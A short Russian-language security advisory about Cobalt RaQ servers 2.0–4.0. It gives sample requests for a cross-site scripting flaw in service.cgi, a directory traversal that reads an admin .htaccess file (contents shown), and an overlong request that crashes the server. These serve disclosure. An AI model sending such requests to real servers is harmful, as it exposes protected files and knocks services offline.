Cobalt RaQ — это сервер, обеспечивающий широкий набор различных интернет-сервисов и обладающий хорошими возможностями дистанционного администрирования.

1. Из-за недостаточного санирования ввода, нападающий может выполнить произвольный код сценария на системе Cobalt RaQ. Проблема происходит в фильтрации злонамеренных HTML-тэгов, при передачи их к сценариям alert.cgi и
service.cgi.

Пример:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert(‘hello’)</script>

2. Cobalt RaQ уязвим к directory traversal. Уязвимость позволяет получить неправомочный доступ к ограниченной информации внутри WWROOT, типа .htaccess файлов.

Пример:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess
# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

3. Когда удаленный пользователь создает чрезмерно длинный запрос к сценарию service.cgi, результаты могут быть непредсказуемы. Запрос:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA…(Ax100000)…AAA

приведет к краху сервера, и для восстановления нормальной работы потребуется перезагрузка. 

Уязвимость найдена в Cobalt RaQ 2.0-4.0



Оставить мнение